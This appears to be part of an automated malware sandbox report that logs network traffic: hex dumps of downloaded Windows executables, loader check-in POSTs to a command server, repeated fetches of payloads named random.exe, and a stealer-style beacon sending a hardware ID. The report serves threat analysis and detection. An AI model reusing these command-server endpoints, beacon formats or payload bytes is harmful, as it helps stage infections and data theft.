Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 00:10:10 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:53 GMTConnection: keep-aliveETag: "675784f1-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 00:10:22 GMTContent-Type: application/octet-streamContent-Length: 1858048Last-Modified: Mon, 09 Dec 2024 23:15:46 GMTConnection: keep-aliveETag: "67577a22-1c5a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 e0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4a 00 00 04 00 00 39 30 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 65 65 77 7a 6b 6f 75 00 e0 19 00 00 f0 2f 00 00 da 19 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 76 6f 74 70 69 67 6b 00 10 00 00 00 d0 49 00 00 04 00 00 00 34 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 49 00 00 22 00 00 00 38 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 00:10:30 GMTContent-Type: application/octet-streamContent-Length: 1806848Last-Modified: Mon, 09 Dec 2024 23:15:53 GMTConnection: keep-aliveETag: "67577a29-1b9200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 50 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 69 00 00 04 00 00 6b 09 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6d 65 70 71 65 69 62 00 f0 19 00 00 50 4f 00 00 ec 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 78 77 70 78 66 6d 6c 00 10 00 00 00 40 69 00 00 06 00 00 00 6a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 69 00 00 22 00 00 00 70 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 00:10:39 GMTContent-Type: application/octet-streamContent-Length: 971264Last-Modified: Mon, 09 Dec 2024 23:14:03 GMTConnection: keep-aliveETag: "675779bb-ed200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b3 79 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 22 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 bf a5 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 88 67 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 67 01 00 00 40 0d 00 00 68 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 00:10:46 GMTContent-Type: application/octet-streamContent-Length: 2841600Last-Modified: Mon, 09 Dec 2024 23:14:28 GMTConnection: keep-aliveETag: "675779d4-2b5c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 31 d1 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 6d 65 79 69 75 68 74 00 00 2b 00 00 a0 00 00 00 fa 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6b 63 64 6f 74 78 6d 00 20 00 00 00 a0 2b 00 00 06 00 00 00 34 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 3a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 00:11:08 GMTContent-Type: application/octet-streamContent-Length: 2841600Last-Modified: Mon, 09 Dec 2024 23:14:30 GMTConnection: keep-aliveETag: "675779d6-2b5c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 31 d1 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 6d 65 79 69 75 68 74 00 00 2b 00 00 a0 00 00 00 fa 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6b 63 64 6f 74 78 6d 00 20 00 00 00 a0 2b 00 00 06 00 00 00 34 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 3a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/7403972632/C1J7SVw.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 36 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013561001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 36 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013562001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 36 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013563001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 38 30 33 34 41 33 39 36 42 30 33 35 35 35 35 31 34 32 33 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="hwid"038034A396B03555514232------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="build"stok------AKKKECBKKECGCAAAEHJK--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 36 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013564001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
